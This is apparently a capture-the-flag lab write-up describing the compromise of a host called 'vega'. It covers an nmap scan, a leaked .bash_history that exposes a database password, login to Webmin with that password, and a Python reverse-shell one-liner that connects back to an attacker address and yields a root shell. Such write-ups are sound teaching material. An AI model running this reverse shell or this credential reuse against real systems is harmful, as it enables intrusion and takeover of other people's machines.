As always we start with a nmap scan
E:\PENTEST\NMAP>nmap -A 10.150.150.222 Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-08 08:56 W. Europe Standard Time Nmap scan report for vega (10.150.150.222) Host is up (0.031s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 af:56:59:c5:9a:de:f4:a9:b7:8f:34:4b:a2:21:24:71 (RSA) | 256 1b:e8:16:d4:dc:a6:7a:3e:5d:6f:f2:95:5a:59:08:9a (ECDSA) |_ 256 9c:35:dd:da:ee:a9:b4:0b:55:68:45:fd:8f:85:35:30 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Did not follow redirect to http://10.150.150.222/?SID=u4lc77vbafcrv7vrskh0c4ciqa 8089/tcp open ssl/http Splunkd httpd |_http-server-header: Splunkd |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Not valid before: 2019-10-25T09:19:54 |_Not valid after: 2022-10-24T09:19:54 10000/tcp open http MiniServ 1.941 (Webmin httpd) |_http-server-header: MiniServ/1.941 |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4.26 OS details: Linux 2.4.26 (Slackware 10.0.0) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 ... 2 31.00 ms vega (10.150.150.222) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 89.51 seconds E:\PENTEST\NMAP>
.
C:\Users\puckiestyle>curl http://10.150.150.222/.bash_history
history
sudo apt-get update && apt-get upgrade -y
sudo apt install apache2
sudo systemctl enable apache2
sudo apt install mariadb-server
sudo a2enmod rewrite
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo a2dissite 000-default.conf
flag40=3e11129fe2d30563999cd1d5602a1f7eb90e2176
sudo systemctl reload apache2
sudo a2ensite magento2.example.com.conf
sudo systemctl reload apache2
cd /tmp/
cd logstalgia-1.0.3/
./configure
sudo passwd root
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc
./configure
make
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc++
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc
apt-get install make
mysql -u root -p
apt-get install grsync
apt-get install unison
unisonsudo systemctl restart apache2
ping 1.1.1.1
ping 8.8.8.8
sudo apt install software-properties-common
sudo apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
sudo add-apt-repository 'deb http://mirrors.coreix.net/mariadb/repo/10.2/ubuntu xenial main'
sudo apt update
echo FLAG40=3e11129fe2d30563999cd1d5602a1f7eb90e2176
sudo apt install mariadb-server -y
netstat -np | grep 22
mysql -u root -p
mysql -u magento -p
sudo apt install php7.0 php7.0-curl php7.0-mysql libapache2-mod-php7.0
sudo nano /etc/php/7.2/cli/php.ini
ipconfig
ifconfig
sudo nano /etc/php/7.2/apache2/php.ini
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo crontab -u vega -e
sudo systemctl restart apache2
sudo cat /var/log/apache2/error.log
sudo chown -R www-data:www-data .
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo /etc/init.d/apache2 restart
sudo nano /etc/apt/sources.list
cd /tmp/
wget http://www.webmin.com/jcameron-key.asc
sudo systemctl reload apache2
cd /tmp/
cd logstalgia-1.0.3/
./configure
cd /home/vega
ls -lah
ifconfig
sudo passwd rootsudo apt-key add jcameron-key.asc
sudo apt update
sudo apt install webmin
cd ..
history
mysqldump -u vega --password=puplfiction1994 magento2 > dumpmagento.sql
cd /home/vega
ls -lah
ll
sudo su
cd /root/
nano CAM.shortcut
C:\Users\puckiestyle>
We can use vega / pulpfiction1994 to logon to https://vega:10000
.
. .
.
> ls CAM.shortcut FLAG42.txt > cat FLAG42.txt 95beef4e71ae3a503282ac54acb6d9cdc547f8c8 > whoami root > hostname vega > cat CAM.shortcut URL: http://10.150.150.250 Notes: Do not forget the cam is only reachable from this jumpstation and another one. [ stuntman mike ]
to get a reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.66.66.42",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
.
E:\PENTEST>nc -nlvp 53 listening on [any] 53 ... connect to [10.66.66.42] from (UNKNOWN) [10.150.150.222] 46718 /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root) # hostname vega #
Author : Puckiestyle